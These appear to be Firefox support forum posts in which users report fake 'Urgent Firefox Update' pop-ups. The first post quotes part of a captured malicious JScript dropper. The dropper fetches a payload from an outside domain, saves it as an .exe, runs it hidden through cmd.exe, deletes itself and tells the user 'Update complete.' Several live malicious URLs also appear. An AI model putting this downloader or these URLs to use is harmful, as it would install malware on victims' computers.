Where to send malware code
I have a .js file and .dat file that I snagged when a Urgent Firefox Update message popped up. This urgent update looked very Firefox Official. I noticed the redirect URL… (read more)
I have a .js file and .dat file that I snagged when a Urgent Firefox Update message popped up. This urgent update looked very Firefox Official. I noticed the redirect URL and it was: https://queidwhoreslag.net/9751229892037/e9e0075191d8aac19e485315d1b67c26.html. So I saved the .js file on one of my other computers and snagged some other stuff from their API. I have the malware code that is Firefox directed. Just need to know where to send the compressed files. Below is a glimpse at some of the .js code:
url='https://queidwhoreslag.net/10/524.dat';
fname=b.GetSpecialFolder(2)+'\\1e90999f64aa011197bfdf7c1792c61b.exe';
for(var i=1;i<=5;i++)
{
try { c.open('GET', url, false); c.send(null); break; }
catch(e){
WScript.Sleep(5000); }
}
d.Open;
d.Type = 1;
d.Write(c.ResponseBody);
d.Position=0;
if (b.Fileexists(fname))b.DeleteFile(fname);
d.SaveToFile(fname);
a.run('cmd.exe /c "'+fname+'"',0,false);
var p = WScript.ScriptFullName;
if (b.FileExists(p))b.DeleteFile(p);
WScript.Echo('Update complete.');
} catch (e) {}
Firefox
I have a adware page that keeps popping up wanting me to download a file
This page pops up daily wanting me to download a firefox patch. https://iebahstarpix.org/7271646175667/a1ddc15a0c7591f710f5ade8fbd7d5e6.html … (read more)
This page pops up daily wanting me to download a firefox patch.
https://iebahstarpix.org/7271646175667/a1ddc15a0c7591f710f5ade8fbd7d5e6.html
Virus update
I keep getting a update link to the following page https://iebahstarpix.org/6101231313503/5cc34215ec33e60df89530f21e45f40d.html however, my Mcaffee antivirus software ke… (read more)
I keep getting a update link to the following page https://iebahstarpix.org/6101231313503/5cc34215ec33e60df89530f21e45f40d.html
however, my Mcaffee antivirus software keeps on indicating that it is a virus on the page
Is this your update or is this a phishing attempt?
Thanks, David Talbot